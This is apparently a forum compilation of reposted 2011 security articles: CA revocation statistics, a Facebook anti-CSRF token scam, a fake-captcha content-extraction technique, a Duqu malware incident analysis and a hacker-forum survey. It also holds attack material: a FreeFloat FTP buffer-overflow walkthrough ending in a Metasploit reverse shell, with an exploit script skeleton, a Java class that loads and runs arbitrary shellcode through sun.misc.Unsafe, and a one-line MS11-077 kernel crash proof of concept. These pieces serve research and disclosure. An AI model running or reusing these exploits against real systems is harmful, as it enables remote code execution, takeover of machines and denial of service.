The most interesting entry in that table is the "CA Compromise" one, because those are incidents that could affect any or every secure web or email server on the Internet. In at least 248 cases, a CA chose to indicate that it had been compromised as a reason for revoking a cert. Such statements have been issued by 14 distinct CA organizations. A previous scan, conducted in June this year, showed different numbers:

+------------------------+-------------+
| reason                 | occurrences |
+------------------------+-------------+
| NULL                   |      876049 |
| Affiliation Changed    |       27089 |
| CA Compromise          |          55 |
| Certificate Hold       |       52786 |
| Cessation Of Operation |      700770 |
| Key Compromise         |       59527 |
| Privilege Withdrawn    |        4589 |
| Superseded             |       66415 |
| Unspecified            |      174444 |
+------------------------+-------------+

Those "CA Compromise" CRL entries as of June were published by 10 distinct CAs. So, from this data, we can observe that at least 4 CAs have experienced or discovered compromise incidents in the past four months. Again, each of these incidents could have broken the security of any HTTPS website.

It is also interesting to examine revocations by reason as a function of time (see the plot in the original post). Generally, this plot reflects enormous growth in HTTPS/TLS deployment, as well as the growing strain that is being placed on its authentication mechanisms.

The problems with the CA system and TLS authentication are urgent and structural, but they can be fixed. In this series of posts, we will set out an EFF proposal for reinforcing the CA system, which would allow security-critical websites and email systems to protect themselves from being compromised via an attack on any CA in the world.

Sursa: https://www.eff.org/deeplinks/2011/10/how-secure-https-today
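A rough sketch of how a tally like the tables above can be reproduced, using the Python cryptography package rather than the Observatory's own tooling (the library choice, the PEM input and the requirement for a recent library version with no backend argument are assumptions of this sketch):

# Tally revocation reasons in a single CRL, similar in spirit to the tables above.
from collections import Counter
from cryptography import x509

def tally_reasons(path):
    crl = x509.load_pem_x509_crl(open(path, "rb").read())
    counts = Counter()
    for revoked in crl:                      # each entry is a RevokedCertificate
        try:
            reason = revoked.extensions.get_extension_for_class(x509.CRLReason).value.reason
            counts[reason.name] += 1         # e.g. "ca_compromise", "key_compromise"
        except x509.ExtensionNotFound:
            counts["no reason (NULL)"] += 1  # no reason code present in this entry
    return counts

if __name__ == "__main__":
    import sys
    for reason, n in sorted(tally_reasons(sys.argv[1]).items()):
        print(f"{reason:25s} {n}")
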
  13. Facebook spammers trick users into sharing anti-CSRF tokens
Posted on 28 October 2011

Facebook spammers have already used a number of different approaches to make users inadvertently propagate their scams, and most of them fall into the social engineering category. A particularly intriguing technique has recently been spotted by Symantec researchers, who believe that this type of approach is likely to be used a lot in the near future.

In short, the scammers make the victim's account post messages by executing a Cross-Site Request Forgery attack after the victim herself has been tricked into sharing her anti-CSRF token generated by Facebook. Once they have the anti-CSRF token, the crooks can generate a valid CSRF token, which allows them to re-use an already authenticated session to the website to post the offending message unbeknownst to the user.

The attack begins with a typical message inviting users to see an "amazing video" or similar content. A click on the link takes the user to a fake YouTube page, and when he wants to see the video, a window pops up telling him that he must pass the "Youtube Security Verification". When he clicks on the Generate Code link, a request is sent to 0.facebook.com/ajax/dtsg.php, which returns JavaScript code containing the session's anti-CSRF token in a separate window. After the user has copied and pasted the generated code into the empty field and pressed the "Confirm" button, he has effectively sent the code to the attacker, who extracts the anti-CSRF token, creates a CSRF token and inserts it into his own piece of code, which finally executes the CSRF attack and posts the malicious message and link on the user's Facebook Wall.

Attacks asking Facebook users to copy/paste JavaScript in order to gain access to some content are not new to the social network, but spammers have not used them a lot lately. Perhaps it is because of the automated monitoring of accounts for suspicious behavior that Facebook has introduced, or perhaps they have misused the approach too many times in a short period, making users wary of such requests. In any case, the researchers believe that this particular approach might gain in popularity, but say that other innovative approaches are sure to come.

Sursa: Facebook spammers trick users into sharing anti-CSRF tokens
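To see why a pasted token is all the attacker needs, here is a small generic sketch (my illustration, not Facebook's actual code) of how an anti-CSRF check typically works on the server side: the server only verifies that the submitted token matches the one bound to the session, so whoever holds the token can make a forged request look intentional.

# Generic anti-CSRF check: the session's token is the only proof of intent.
import hmac, secrets

SESSIONS = {}                                   # session_id -> csrf_token

def issue_token(session_id):
    SESSIONS[session_id] = secrets.token_hex(16)
    return SESSIONS[session_id]

def post_message(session_id, token, text):
    expected = SESSIONS.get(session_id, "")
    if not hmac.compare_digest(expected, token):    # constant-time comparison
        raise PermissionError("CSRF check failed")
    print("posted on behalf of", session_id, ":", text)

sid = "victim-session"
tok = issue_token(sid)                 # the value the scam tricks the victim into pasting
post_message(sid, tok, "some link")    # accepted: the token matches, so the request passes
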
  14. Cross domain content extraction with fake captcha
TUESDAY, JULY 5, 2011

Content extraction is one of the recently documented UI redressing vectors. It exploits Firefox behaviour that allows any URL's HTML source to be displayed in an iframe, like this:

<iframe src="view-source:http://any-page-you.like/cookies-included">

With social engineering, the attacker tricks the user into selecting the (usually invisible) page source and dragging it to an attacker-controlled textarea. (A simple demo is in the original post.) Once the attacker gets the page source dropped into his textarea, he may begin to extract contents (like session IDs, user names, anti-CSRF tokens, etc.) and launch further attacks. However, this way of using the vector requires significant effort from the user and is pretty difficult to exploit in a real-world situation (there's some clicking and dragging involved). Also, it will stop working once Mozilla disallows cross-origin drag & drop. I've found a neat way to do cross-origin content extraction that might be more suitable for some classes of websites. Ladies and gentlemen, let me present Fake Captcha.

NO MORE DRAG

The weak point of the 'classic' method for me was the dragging that was involved. In Firefox, once you drag something, it displays a shadow of the object at the cursor, and a whole HTML source being displayed to the user is really hard to hide. I decided to convince the user to copy & paste the source with his clipboard instead. Copying & pasting requires four steps: selecting the text to copy, Ctrl-C, navigating to the target element, Ctrl-V. Each of these steps requires user intervention. I could make a game/quiz that requires certain keypresses, but that's weak (although it works for Facebook users). Instead, I wanted it to feel natural for the user. Nothing is hidden and he just uses the clipboard because he wants to.

SO, WHEN DO YOU USE A CLIPBOARD?

Well, I don't like typing. So every time I'm forced to repeat my e-mail address in a form, I just copy/paste it. I decided to go that way. What if we display a longish captcha-like 'security code' for the user to retype? 16 characters or more? Some users will skip this step altogether, some will retype, but most will select the text and copy/paste.

HOW DO YOU SELECT?

You can select with your mouse. In Firefox, you can also select by double / triple clicking. My assumption is that most users use the clicking method to select text. A double click stops at a word boundary; a third click expands to the whole paragraph (try this text). In the above example, you need three clicks to select the whole visible code. Why do we care?

I'M FRAMED!

Because the security code input field is just a precisely positioned part of the view-source:d victim page. And by triple clicking, the user selects the whole line from the page source!

DEMO

It's best to see the demo to understand what's going on. We want to extract the anti-CSRF token from the victim page cross-domain. The token is in the page source, line 7:

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>NDCP</title>
<script type="text/javascript">
  var csrf_token = '35fb6df6-2ab9-408b-abe3-769412a58e15';
</script>
<style>
  body {
    background: url(nuke.jpg) left top repeat;
    color: white;
    font-family: Verdana, arial, sans-serif;
  }
// and so on

So we display the source in a small frame and position it to only display a few characters, starting from line 7, column 19. Then we convince the user to select the whole line with a triple click (a double click will stop at the minus sign, so the user will probably do the third click to select it all). After selecting, he copies, clicks the next field and pastes. Then we're done.

DETAILS MATTER

See the source to appreciate all the small but very important details, especially:
- how to measure the font size used in view-source:
- what view-source:view-source: was used for
- how to position an iframe at a line / column of the HTML source
- how the input and the frame were styled to look similar

HOW NOT TO GET OWNED?

- web developers: use the X-Frame-Options header (JS framebusting won't work here). Remember, once you allow your site to be framed, you're opening it up to a whole class of UI redressing attacks; most of the attacks are not even discovered yet, it's a new field of research. So if you don't use X-Frame-Options, better have a really good explanation.
- users: don't use Firefox, or look carefully at what you do; use NoScript.

SUMMARY

There's a new 'fake captcha' method of using the content extraction UI redressing vector.

Pros:
- does not require drag & drop
- accounts for font-size differences
- more convincing for the user

Cons:
- won't work if the user uses the mouse to select text (unless the attacker is interested in only the visible part)
- requires a captcha-like string in the victim HTML source; its line / column position must be constant and known to the attacker
- only one line of HTML source can be copied (but websites' HTML is often minimized to a single line)

You might find the requirements very limiting. I also thought it was simply impossible to exploit in real life. Until I started looking... wait for the next post.

Update: The latest NoScript (2.1.2+) contains code neutralizing the fake captcha method. Yet another great piece of work by Giorgio Maone!

Update 2: The fake CAPTCHA technique has been spotted in the wild, used to extract Facebook CSRF tokens.

Sursa: Cross domain content extraction with fake captcha
  15. Nytro

    Good evening.

    Topic closed.
  16. Nytro

    Anonsboat

    Supposedly: antena1 • View topic - THE ANONYMOUS HACKERS ARE TAKING ACTION! They also have a Facebook account and the same Messenger ID. Just a thought: I don't know what you all think, but when I saw that they use some dumper or other, made an account on .co.cc and chat over Messenger... it already strikes me as sad. "PS: MIRA - EXPECT US!" PS: Mai.gov.ro may also have an RFI, besides the SQLi (on one domain). Just letting you know. Be careful.
  17. Creating your own Abstract Processor © Aodrulez

Introduction: In this paper, I'll try to explain to you how to create your own abstract processor. It can be really simple or absolutely complex, and it will depend entirely on your imagination. First of all, let me explain what an abstract processor is. It's nothing but a purely theoretical processor architecture that one can develop by programming at the software level. If that sounded too complex, think of it as creating your own processor by writing code in, let's say, C/C++ or Perl, with registers, stack size, etc. that you define. Don't worry too much if you haven't got the concept yet. I'm sure you will grasp it along the way.

Download: http://dl.packetstormsecurity.net/papers/general/Abstract-Processor.pdf
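As a toy illustration of the idea (mine, not taken from the paper), here is a minimal abstract processor in Python: a register file and stack that exist only in software, a handful of made-up opcodes, and a fetch-decode-execute loop.

# A deliberately tiny "abstract processor": the registers, stack and opcodes
# below are defined entirely at the software level, as the paper describes.
class TinyCPU:
    def __init__(self):
        self.regs = {"A": 0, "B": 0, "C": 0, "D": 0}   # our own register file
        self.stack = []                                # our own stack
        self.pc = 0                                    # program counter

    def run(self, program):
        while self.pc < len(program):
            op, *args = program[self.pc]
            self.pc += 1
            if op == "MOV":    self.regs[args[0]] = args[1]
            elif op == "ADD":  self.regs[args[0]] += self.regs[args[1]]
            elif op == "PUSH": self.stack.append(self.regs[args[0]])
            elif op == "POP":  self.regs[args[0]] = self.stack.pop()
            elif op == "JNZ":  self.pc = args[1] if self.regs[args[0]] else self.pc
            elif op == "PRN":  print(args[0], "=", self.regs[args[0]])
            else: raise ValueError("unknown opcode " + op)

# Count register A down from 3 to 0, then print it.
prog = [("MOV", "A", 3), ("MOV", "B", -1), ("ADD", "A", "B"), ("JNZ", "A", 2), ("PRN", "A")]
TinyCPU().run(prog)
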
  18. Thexero: Exploit Development - Abusing The Stack

Description: Once you get into exploit development, you'd soon realize just how easy the process of developing an exploit becomes. To start with, a buffer overflow condition generally causes the target application to crash. I first load up a simple Python-based fuzzer script and attempt to fuzz a free FTP server called 'FreeFloat FTP Server', which is hosted on a machine in my lab with the IP of 192.168.72.129. The program stops responding to our FTP requests after 300 A's after the USER command. We then load the program into Immunity Debugger and attempt to replicate the crash once again, and once it crashes we notice that EIP has been completely overwritten with '41414141', which is the hex equivalent of the letter A. For simplicity's sake we decide to export the target IP address and port number to our local environment variables so that the potential of entering the wrong IP is minimized. We then load up Metasploit's 'Pattern Create' tool to create a unique string that helps us identify the exact position of the EIP overwrite, which turned out to be 230. We then modify our buffer to include 230 A's, then send 'DEADBEEF' as the address to overwrite EIP; the rest of our buffer also overflows into the ESP register, which means that if we overwrite EIP with a memory address that contains the instruction 'JMP ESP', the next instructions to run will hopefully be the ones residing at ESP. We then send all hex bytes (minus \x00, as it would kill our TCP connection to the FTP server) and attempt to identify any bad characters that may be included in our shellcode later on. Metasploit is then opened with the console interface and we begin to create test shellcode, excluding the bad characters from the payload, that will run the Windows calculator application. As the payload will be encoded, we had to add 8 NOPs to our buffer so that there was sufficient room for the payload to decode itself. Once the test shellcode was added we tested our exploit, which successfully crashed the program but at the same time executed our code and opened the Windows calculator. Back in Metasploit we create a Windows reverse shell payload, again excluding the bad characters that we had previously found, and wrote all the hex bytes to a file called 'shellcode', which we then opened with gedit. We then replaced the test Windows calculator payload with the first stage of our newly created staged Windows reverse shell payload to complete our exploit. Then we set up Metasploit to listen on port 4444 for a staged Windows reverse shell and executed our exploit, which resulted in the target machine connecting back to our machine. As we chose a staged payload, our machine delivered stage 2 of the payload, giving us a full reverse Windows command prompt, and from then on we had full control over that session.

Video: http://www.securitytube.net/video/2377
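A hedged Python sketch of the buffer layout described in the walkthrough: 230 bytes of padding, a return address, a short NOP sled and the shellcode, sent after the USER command. The JMP ESP address and the shellcode bytes below are placeholders, not the values from the video.

# Sketch of the exploit buffer from the walkthrough; placeholder values only.
import socket, struct

TARGET_IP, TARGET_PORT = "192.168.72.129", 21      # lab host from the description
OFFSET = 230                                       # bytes before EIP, per pattern_offset
JMP_ESP = struct.pack("<I", 0xDEADBEEF)            # placeholder address (little-endian)
NOPS = b"\x90" * 8                                 # room for the encoder stub to unpack
SHELLCODE = b"\xcc" * 32                           # placeholder for msfvenom output

payload = b"A" * OFFSET + JMP_ESP + NOPS + SHELLCODE

s = socket.create_connection((TARGET_IP, TARGET_PORT), timeout=5)
s.recv(1024)                                       # read the FTP banner
s.send(b"USER " + payload + b"\r\n")               # the overflow happens after USER
s.close()
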
  19. Running shellcode from Java without JNI
© 2011 Michael Schierl <schierlm at gmx dot de> (Twitter @mihi42)

/*
 * Running shellcode from Java without JNI (i. e. loading a DLL from disk).
 * © 2011 Michael Schierl <schierlm at gmx dot de> (Twitter @mihi42)
 *
 * Tested versions:
 * .---------------------------.---------.------------.---------.-----------------.
 * | JVM version               | MA slot | Native Ptr | Raw RET | EXITFUNC thread |
 * |===========================|=========|============|=========|=================|
 * | Oracle 1.4.2 Win32        |      25 |         15 | C3      | Not supported   |
 * | Oracle 1.5 Win32          |      29 |         14 | C3      | Not supported   |
 * | Oracle 1.6 Win32          |      29 |         19 | C3      | Not supported   |
 * |---------------------------|---------|------------|---------|-----------------|
 * | Oracle 1.6 Linux 32-bit   |      28 |         19 | C3      | Not supported   |
 * '---------------------------'---------'------------'---------'-----------------'
 *
 * How to test other versions:
 *
 * 1. Compile this class with settings supported by your target JVM (and
 * -target 1.1) and run it without arguments. It will examine the class fields
 * for candidates that might hold a pointer to the method array. The method
 * array is a Java array that contains one entry for each method, and this
 * entry contains a native pointer to its entry point (for native methods).
 * Therefore we first have to find the offset of this pointer. First filter
 * out all values that are most likely not pointers (too small, too "round",
 * etc.) In case you have a debugger handy, look at the remaining candidates.
 * A method array will start with jvm flags (usually 0x00000001), a pointer
 * to the array's element class object, its length (which should be equal to
 * the number printed above the candidate table), and a pointer to each of the
 * elements. The rest (up to an architecture-dependent size) is padded with
 * zeros. If you don't have a debugger handy, just try all of the candidates
 * in the next step until you get success.
 *
 * [Note: On Win32, the slots before the pointer are filled with 0,0,0(,0,1,0,0).]
 *
 * 2. Run the class with the (suspected) correct method array slot number as its
 * (only) argument. If the slot was wrong, the JVM will most likely print an
 * obscure error message or crash. If the slot was correct, it will dump the
 * fields of the method object inside the array. One of these fields is a
 * native pointer of the function (by default, on Windows, this points to a
 * stub method that throws an UnsatisfiedLinkError). So examine the pointers
 * until you found this method, or again just use trial and error in the next
 * step.
 *
 * [Note: On Win32, there is 0 and another pointer before it, and 0,0,1 after]
 *
 * 3. Run the class with two parameters, first the method array slot number from
 * step one, then the native pointer slot number from step two. It will try to
 * fill that pointer with 0x4141414141414141, therefore examine the (expected)
 * crash log if it crashes at that pointer. If you cannot examine the crash log,
 * just try the following steps with each other alternative. The first two
 * parameters have to be kept for all the following steps, there are only parameters
 * to be added.
 *
 * 4. Run the class with "raw C3" as the 3rd and 4th parameter (if your architecture
 * uses a different opcode for RET, replace it, e. g. "raw DE AD BE EF"). This code
 * will be written into a freshly allocated memory region and the region's base
 * address will be used for the pointer. This time, the program should not crash,
 * but return, and print a success message as last step. Running it with
 * "threaded raw C3" should result in the same results.
 *
 * 5. Use Metasploit or similar to build a native shellcode for your platform,
 * using EXITFUNC = thread (or similar) - EXITFUNC = RET would be better. Now run
 * the class with "file /path/to/your/shellcode" as 3rd and 4th parameter, which
 * should result in execution of your shellcode, but probably a crash afterwards.
 * Try again with "threaded file /path/to/your/shellcode". On Windows, both variants
 * run the shellcode, but crash/hang afterwards, therefore the "Not Supported" in the
 * last column of the table. [The unthreaded approach kills the Java process on exit,
 * the threaded approach hangs forever.]
 *
 * 6. Fill in the table above and send it to me
 */

import java.io.File;
import java.io.FileInputStream;
import java.lang.reflect.Array;
import java.lang.reflect.Field;

import sun.misc.Unsafe;

public class ShellcodeTest implements Runnable {

    private static int addressSize;

    public static void main(String[] args) throws Exception {
        // avoid Unsafe.class literal here since it may introduce
        // a synthetic method and disrupt our calculations.
        java.lang.reflect.Field unsafeField = Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe");
        unsafeField.setAccessible(true);
        Unsafe unsafe = (Unsafe) unsafeField.get(null);
        addressSize = unsafe.addressSize();
        Class thisClass = Class.forName("ShellcodeTest");
        final int METHOD_COUNT = thisClass.getDeclaredMethods().length + 1;
        System.out.println("[*] Shellcode class has " + METHOD_COUNT + " methods.");
        Field staticField = thisClass.getDeclaredField("addressSize");
        Object staticFieldBase = unsafe.staticFieldBase(staticField);
        if (args.length == 0) {
            System.out.println("[*] Candidates for method array slot:");
            long staticFieldOffset = unsafe.staticFieldOffset(staticField);
            printStaticSlots(unsafe, staticFieldBase, staticFieldOffset);
            System.out.println("[*] Select method array slot now!");
            return;
        }
        long methodArraySlot = Integer.parseInt(args[0]);
        System.out.println("[*] Obtaining method array (slot " + methodArraySlot + ")");
        Object methodArray = unsafe.getObject(staticFieldBase, methodArraySlot * addressSize);
        int methodCount = Array.getLength(methodArray);
        if (methodCount != METHOD_COUNT) {
            System.out.println("[-] ERROR: Array length is " + methodCount + ", should be " + METHOD_COUNT);
            return;
        }
        System.out.println("[+] Successfully obtained method array");
        Field methodSlotField = Class.forName("java.lang.reflect.Method").getDeclaredField("slot");
        methodSlotField.setAccessible(true);
        int shellcodeMethodSlot = ((Integer) methodSlotField.get(thisClass.getDeclaredMethod("shellcode", new Class[0]))).intValue();
        System.out.println("[*] Obtaining method object (slot " + shellcodeMethodSlot + ")");
        Object methodObject = Array.get(methodArray, shellcodeMethodSlot);
        System.out.println("[+] Successfully obtained method object");
        if (args.length == 1) {
            System.out.println("[*] Candidates for native pointer slot:");
            printStaticSlots(unsafe, methodObject, 30 * addressSize);
            System.out.println("[*] Select native pointer slot now!");
            return;
        }
        long nativePtrSlot = Integer.parseInt(args[1]);
        long nativePtrTarget;
        boolean useThread = false;
        int argOffset = 2;
        if (args.length > 2 && args[2].equals("threaded")) {
            argOffset++;
            useThread = true;
        }
        if (args.length == argOffset) {
            System.out.println("[*] Setting native pointer slot to 0x4141414141414141 (should crash at that address!)");
            nativePtrTarget = 0x4141414141414141L;
        } else {
            String mode = args[argOffset];
            argOffset++;
            if (mode.equals("raw")) {
                // raw c3
                nativePtrTarget = unsafe.allocateMemory(args.length - argOffset);
                for (int i = argOffset; i < args.length; i++) {
                    unsafe.putByte(nativePtrTarget + i - argOffset, (byte) Integer.parseInt(args[i], 16));
                }
            } else if (mode.equals("file")) {
                File file = new File(args[argOffset]);
                nativePtrTarget = unsafe.allocateMemory(file.length());
                FileInputStream fis = new FileInputStream(file);
                int b;
                long ptr = nativePtrTarget;
                while ((b = fis.read()) != -1) {
                    unsafe.putByte(ptr, (byte) b);
                    ptr++;
                }
            } else {
                System.out.println("Unsupported mode: " + mode);
                return;
            }
        }
        System.out.println("[*] Trying to overwrite native method pointer (slot " + nativePtrSlot + ")");
        if (addressSize == 8)
            unsafe.putLong(methodObject, nativePtrSlot * addressSize, nativePtrTarget);
        else
            unsafe.putInt(methodObject, nativePtrSlot * addressSize, (int) nativePtrTarget);
        System.out.println("[+] Successfully overwritten native method pointer");
        if (useThread) {
            System.out.println("[*] Executing native method in thread");
            Thread thread = new Thread(new ShellcodeTest());
            thread.start();
            System.out.println("[*] Thread started");
            thread.join();
            System.out.println("[*] Thread successfully finished");
        } else {
            System.out.println("[*] Executing native method (drum roll...)");
            shellcode();
            System.out.println("[+] Executed native method and returned!");
        }
    }

    public void run() {
        try {
            shellcode();
        } catch (Throwable t) {
            t.printStackTrace();
        }
    }

    private static void printStaticSlots(Unsafe unsafe, Object object, long maxOffset) {
        for (long offset = 0; offset < maxOffset; offset += addressSize) {
            long value = addressSize == 8 ? unsafe.getLong(object, offset) : unsafe.getInt(object, offset) & 0xFFFFFFFFL;
            System.out.println("\t" + offset / addressSize + "\t" + Long.toHexString(value));
        }
    }

    private static native void shellcode();
}

Sursa: [Java] /* * Running shellcode from Java without JNI (i. e. loading a DLL from disk). - Pastebin.com
  20. Nytro

    Good evening.

    Yet another embarrassing discussion.
  21. The Mystery of Duqu: Part Two

Aleks, Kaspersky Lab Expert
Posted October 25, 19:59 GMT

Part I: http://www.securelist.com/en/blog/208193182/The_Mystery_of_Duqu_Part_One

Our investigation and research of the Duqu malware continues. In our previous report, we made two points:

- there are more drivers than was previously thought;
- it is possible that there are additional modules.

Besides those key points, we concluded that, unlike the massive Stuxnet infections, Duqu attacks are contained within an extremely small number of targets.

But before presenting our new findings, I would like to pay tribute to the Hungarian research laboratory CrySyS for their work. They were the first to analyze the Duqu components and they produced an excellent report, which was later provided to antivirus vendors and became the basis of further investigations. (Unfortunately, our company was not the first to receive this report, but now it's even more interesting to find out everything about Duqu.)

Our experts continue to conduct in-depth analysis of all Duqu components and keep finding more evidence of similarities between Duqu and Stuxnet. A detailed report with our experts' analysis of the files and their structure is in progress and will be published later. That part of our research is not the most important or urgent; it is much more essential to understand the reasons and the sequence of events, which is what we discuss here.

Real incidents

In our previous blog, we mentioned that in the preceding 24 hours we had found only one real incident after adding detection for all known Duqu components. Since then, we have discovered more, which allows us to draw some conclusions about the attack vector itself. It is important to mention that we can neither confirm nor deny information from other AV vendors about known incidents in the UK, the USA and possibly Austria and Indonesia. We are making no comments on any incidents in Hungary. Let's focus only on the cases we have discovered with the help of the Kaspersky Security Network.

Incident #1: Sudan

One of the first real infection cases took place in a very specific region, as we confirmed earlier: Sudan. In this case, we found a completely new driver which differs from previous variants in both name and MD5. Based on our finding that the main Duqu module consists of three components (driver, DLL library and configuration file), we may speculate that two more files are part of the package. But we haven't observed any detections in our customer base with our current detection set, which means these files are different from the known examples (netp191/192.pnf, cmi4432/cmi4464.pnf). Unfortunately, we were not able to reach the infected user for a detailed analysis of this incident, and we do not have a copy of the adp55xx.sys driver. We know only its file name, size and checksum at this point.

Incident #2: Iran

At the moment, the highest number of Duqu incidents has been found in Iran. This fact brings us back to the Stuxnet story and raises a number of issues. But first, let's look into some details. We see the same situation: a new unique file name (iraid18.sys), an already known file size (24960 bytes) and a new checksum. Besides those three static file characteristics, there are other differences. We found not only a new driver, but also a new configuration file, "ird182.pnf". It is doubtless analogous to the known files (same size, 6570 bytes), but its content differs, because this file must be unique: it stores information about the infection date in order to control the subsequent uninstall process.

Another driver is even more interesting. We were not able to restore its original name, and, despite being the same size as previous Duqu drivers, it is different from iraid18.sys, which was found at the same infected location, and from all previously known drivers. At this point, we see an almost completely new set of modules with similar names: iraid18.sys + ird182.pnf + an unknown main DLL library (which we suspect may have a name like "ird181.pnf").

Incident #3: Iran

This incident is one of the most interesting. Here we have an infection of two systems connected to each other. Besides being on the same network, they were also infected with the same driver (new again) – igdkmd16b.sys. We were able to obtain a copy of this file:

Publisher: Intel Corporation
Product: Intel Graphics Accelerator
Description: Intel Graphics Kernel Mode Driver
File version: 2.2.0.15
Original name: igdkmd16b.sys
Internal name: igdkmd16b.sys
Size: 25088 bytes
Date of compilation: 17 October 2011

Notice that before this incident we had never seen a file of size 25088 bytes. Until this case, we had only seen drivers of 24960 bytes (without a digital signature) or 29568 bytes (with a digital signature). In addition, we found two more files on one of the systems (unfortunately, we weren't able to get copies of them). The first is a configuration file named netq795.pnf and the second is an unknown driver with the same size of 25088 bytes but a different checksum. As in incident #2, here we also have an almost completely new set of modules: igdkmd16b.sys + netq795.pnf + an unknown main DLL library (which we suspect may have a name like "netq794.pnf").

Incident #4: Iran

As in all the incidents described above, there is a unique driver which differs from previous ones both in name (bpmgs.sys) and in size (24832 bytes). Unfortunately, we weren't able to get a copy of the file and its content is still a mystery. The same goes for its corresponding configuration file.

At the same time, we found something that is probably not related to this Duqu case. BUT! This computer was attacked several times over the network not long ago: on October 4 and October 16. Both attacks used an exploit abusing the MS08-067 vulnerability (the one used by Kido and Stuxnet). The IP address of the attacker was 63.87.255.149 in both cases. It is owned by 'MCI Communications Services, Inc.', a subdivision of 'Verizon Business'. So, imagine the situation: two attacks in a 12-day period from one IP address. What is the probability that these attacks were performed automatically by Kido? It is plausible for a single attack; it is not for two. This suggests that the attacks were not accidental, but targeted. It is possible that the attacker used not only MS08-067, but also other exploits that were not traced.

Conclusions and facts

1. We have recorded incidents only in Sudan and Iran;
2. We have no information about the victims' relations either with Iran's nuclear program or with CAs or industry;
3. It is obvious that every single Duqu incident is unique, with its own files with different names and checksums;
4. Duqu is used for targeted attacks with carefully selected victims (the word APT was here, but I struck it out because I don't like the term);
5. We know that there are at least 13 different driver files (and we have only 6 of them);
6. We haven't found any 'keylogger' module usage. It is possible that it has never been used in this particular set of incidents, or that it has been encrypted, or that it has been deleted from the systems;
7. Analysis of the driver igdkmd16b.sys showed that there is a new encryption key, which means that existing detection methods for the known PNF files (main DLL) are useless. It is obvious that the DLL is encoded differently in every single attack. Existing detection methods from the majority of AV vendors are able to successfully detect Duqu drivers, but the probability of missing the main DLL component (PNF) is almost 100%;
8. Duqu is a multifunctional framework which is able to work with any number of modules. Duqu is highly customizable and universal;
9. The main library (PNF) is able (via export 5) to fully reconfigure and reinstall the package. It can install drivers, create additional components, record everything in the registry, etc. This means that if there is a connection to an active C&C issuing commands, then Duqu's infrastructure on a particular system might be changed completely;
10. The authors of Duqu were able to install updated modules on infected systems just before the information about this malware was published, because we continue to discover new Duqu drivers created on October 17, 2011. We do not exclude the possibility that they were also able to change the C&C;
11. We do not exclude that the known C&C in India was used only in the first known incident (see the original report from the CrySyS lab) and that there are unique C&Cs for every single target, including the targets found by us;
12. Reports that Duqu works on infected systems for only 36 days are not entirely correct. Even this data point is customized: only jminet7.sys/netp191.pnf uses a 36-day counter; the cmi4432.sys/cmi4432.pnf set of modules will remove itself after 30 days.

Sursa: http://www.securelist.com/en/blog/208193197/The_Mystery_of_Duqu_Part_Two
  22. DDoS and SQL injection are main topics on hacking forums

By Lucian Constantin, IDG News Service
October 18, 2011 11:05 AM ET

Distributed denial of service and SQL injection are the main types of attack discussed on hacking forums, according to new research from security vendor Imperva.

Underground discussion forums are an important piece of the cybercriminal ecosystem. They offer a place for hackers to sell and exchange information, software tools, exploits, services and other illegal goods. "Forums are the cornerstone of hacking -- they are used by hackers for training, communications, collaboration, recruitment, commerce and even social interaction," Imperva stressed.

The company's researchers recently analyzed discussions going back several years from HackForums.net, one of the largest hacker forums with over 220,000 registered members. Their effort was aimed at determining the most common attack targets, what business trends can be observed, and what directions hackers are leaning toward.

As far as attack popularity goes, the analysts determined that DDoS was mentioned in 22 percent of discussions. SQL injection, a technique commonly used to compromise websites, is the second most frequently discussed attack method, at the center of 19 percent of conversations. Unsurprisingly, with a 16 percent occurrence rate, spam is the third most popular attack type according to Imperva's content analysis; that's probably because it is one of the primary methods of generating illegal income. Zero-day exploits make up 10 percent of attack discussions on the forum; however, Microsoft's latest Security Intelligence Report (SIR) claims that this type of exploit is used in less than 1 percent of real-world compromises.

Forums are also an important learning tool for new hackers -- Imperva determined that up to a quarter of discussions fall into the beginner hacking category. Another 25 percent of conversations involved hacking tools and programs, while a fifth mentioned Web and forum hacking.

One trend observed by Imperva's researchers was that mobile hacking is increasingly popular. This is also reflected in real-world attack statistics and reports from other vendors. iPhone hacking in particular accounted for half of the conversations on this topic. Overall, discussions about hacking have increased more than 150 percent over the last four years. "We think the growth in hacker forum activity helps explain that, along with automated hacking, there are simply more hackers causing more breaches," Imperva concluded.

Sursa: DDoS and SQL injection are main topics on hacking forums
  23. MS11-077 Win32k Null Pointer De-reference Vulnerability POC

# Exploit Title: MS11-077 Win32k Null Pointer De-reference Vulnerability POC
# Date: 10/19/2011
# Author: KiDebug
# Version: Windows XP SP3 32bit
# Tested on: Windows XP SP3 32bit
# CVE: CVE-2011-1985
# Exploit Code. Only a single line of code can cause a BSOD:

#include <Windows.h>
void main() {
    SendMessageCallback((HWND)-1, CB_ADDSTRING, 0, 0, 0, 0);
}

or:

#include <Windows.h>
void main() {
    SendNotifyMessage((HWND)-1, CB_ADDSTRING, 0, 0);
}

These messages can also cause a BSOD:

// CB_ADDSTRING         0x0143
// CB_INSERTSTRING      0x014A
// CB_FINDSTRING        0x014C
// CB_SELECTSTRING      0x014D
// CB_FINDSTRINGEXACT   0x0158
// LB_ADDSTRING         0x0180
// LB_INSERTSTRING      0x0181
// LB_SELECTSTRING      0x018C
// LB_FINDSTRING        0x018F
// LB_FINDSTRINGEXACT   0x01A2
// LB_INSERTSTRINGUPPER 0x01AA
// LB_INSERTSTRINGLOWER 0x01AB
// LB_ADDSTRINGUPPER    0x01AC
// LB_ADDSTRINGLOWER    0x01AD

0: kd> r
eax=0000001b ebx=ee0af1fa ecx=ffffffff edx=bbdd0650 esi=ffffffff edi=ee21fd64
eip=bf914e9b esp=ee21fd08 ebp=ee21fd08 iopl=0         nv up ei pl nz na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010206
win32k!NtUserfnINCBOXSTRING+0x8:
bf914e9b 8b4120          mov eax,dword ptr [ecx+20h] ds:0023:0000001f=????????

0: kd> kp
ChildEBP RetAddr
ee21fd08 bf80ef2b win32k!NtUserfnINCBOXSTRING+0x8
ee21fd40 8054261c win32k!NtUserMessageCall+0xae
ee21fd40 7c92e4f4 nt!KiFastCallEntry+0xfc
0012ff2c 77d194be ntdll!KiFastSystemCallRet
0012ff5c 00401015 USER32!NtUserMessageCall+0xc
0012ff78 0040114c 1!main(void)+0x15 [r:\temp\1\1.cpp @ 6]
